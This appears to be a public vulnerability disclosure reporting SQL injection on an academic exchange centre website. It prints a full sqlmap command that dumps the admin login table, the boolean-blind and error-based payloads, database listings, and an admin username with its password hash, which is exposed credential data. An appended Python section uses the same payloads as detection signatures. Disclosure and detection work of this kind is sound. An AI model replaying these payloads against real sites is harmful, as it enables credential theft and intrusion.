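2015-10-11: Details reported to the vendor; awaiting vendor handling
2015-10-15: Vendor confirmed; details disclosed to the vendor only
2015-10-25: Details disclosed to core white hats and experts in related fields
2015-11-04: Details disclosed to regular white hats
2015-11-14: Details disclosed to trainee white hats
2015-11-29: Details disclosed to the public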
SQL injection vulnerability in a page of the Hong Kong Academic Exchange Centre (login password can be obtained)
Injection point: http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891
Tested with sqlmap:
python sqlmap.py -u "http://**.**.**.**/articles/?do=view&l=299&catalog_id=367&article_id=891" --dbs --random-agent -p l --technique=BE -D essqlsite30 -T man_login -C login_name,login_pwd --dump
---
Parameter: l (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: do=view&l=299' RLIKE (SELECT (CASE WHEN (4662=4662) THEN 299 ELSE 0x28 END)) AND 'wQJK'='wQJK&catalog_id=367&article_id=891

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: do=view&l=299' AND (SELECT 2555 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(2555=2555,1))),0x71716a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VAbx'='VAbx&catalog_id=367&article_id=891
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [4]:
[*] essqlsite30
[*] information_schema
[*] test
[*] test_epl20
Database: essqlsite30
[23 tables]
+--------------------+
| article_attachment |
| article_image      |
| article_thread     |
| assoc_queue        |
| catalog_extra      |
| item_catalog       |
| man_login          |
| man_remark         |
| man_sessions       |
| member_group       |
| membership         |
| module_interface   |
| people             |
| people_sessions    |
| priv_group_role    |
| priv_rule_set      |
| privilege_group    |
| privilege_module   |
| privilege_rank     |
| privilege_role     |
| setting            |
| setting_extra      |
| setting_global     |
+--------------------+
Database: essqlsite30
Table: man_login
[8 columns]
+------------------+-------------+
| Column           | Type        |
+------------------+-------------+
| lastlogin_ip     | varchar(64) |
| lastlogin_time   | int(11)     |
| login_name       | varchar(64) |
| login_pwd        | varchar(32) |
| muid             | varchar(32) |
| total_logintimes | int(11)     |
| total_onlinetime | int(11)     |
| whether_locked   | char(1)     |
+------------------+-------------+
+------------+----------------------------------+
| login_name | login_pwd                        |
+------------+----------------------------------+
| adminsxbhk | 30a74edfd207515c532a6abae75d2174 |
+------------+----------------------------------+
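Unfortunately I could not crack the password.. Hope this gets accepted.
Add a WAF.
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-10-15 12:52
The relevant organization has been contacted to handle this.
None yet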
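
Since the report recommends a WAF, the following added example (not part of the original report or of the vendor's code) shows detection logic for the two payload types in the sqlmap output above, run over access-log lines. The payload strings are copied from the report; the log format, IP addresses, timestamp and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Query parameters that carry numeric IDs in the URL from the report.
NUMERIC_PARAMS = {"l", "catalog_id", "article_id"}
# Signatures derived from the two payload types in the sqlmap output.
SIGNATURES = {
    "boolean-blind RLIKE/CASE": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S),
    "error-based FLOOR(RAND) GROUP BY": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(.*\bGROUP\s+BY\b", re.I | re.S),
    "INFORMATION_SCHEMA reference": re.compile(r"\bINFORMATION_SCHEMA\b", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value.
        if name in NUMERIC_PARAMS and not (value.isascii() and value.isdigit()):
            findings.append(f"{name}: non-numeric value")
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.append(f"{name}: {label}")
    return findings

def scan_log(lines):
    """Map 1-based line number to findings for access-log lines."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        findings = inspect_request(match.group(1)) if match else []
        if findings:
            hits[number] = findings
    return hits

def sample_line(ip, l_value):
    """Build a constructed combined-format log line (not real log data)."""
    return (f'{ip} - - [11/Oct/2015:10:00:00 +0800] "GET /articles/?do=view'
            f'&l={quote(l_value)}&catalog_id=367&article_id=891 HTTP/1.1" 200 512')

# Constructed sample log: one normal request, then the two payloads from the report.
SAMPLE_LOG = [
    sample_line("192.0.2.10", "299"),
    sample_line("198.51.100.7", "299' RLIKE (SELECT (CASE WHEN (4662=4662) THEN 299 ELSE 0x28 END)) AND 'wQJK'='wQJK"),
    sample_line("198.51.100.7", "299' AND (SELECT 2555 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(2555=2555,1))),0x71716a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VAbx'='VAbx"),
]
```

The numeric check on `l` catches both requests even without the signatures, which is why strict type validation (or a parameterized query) at the application is the more durable fix than pattern matching alone.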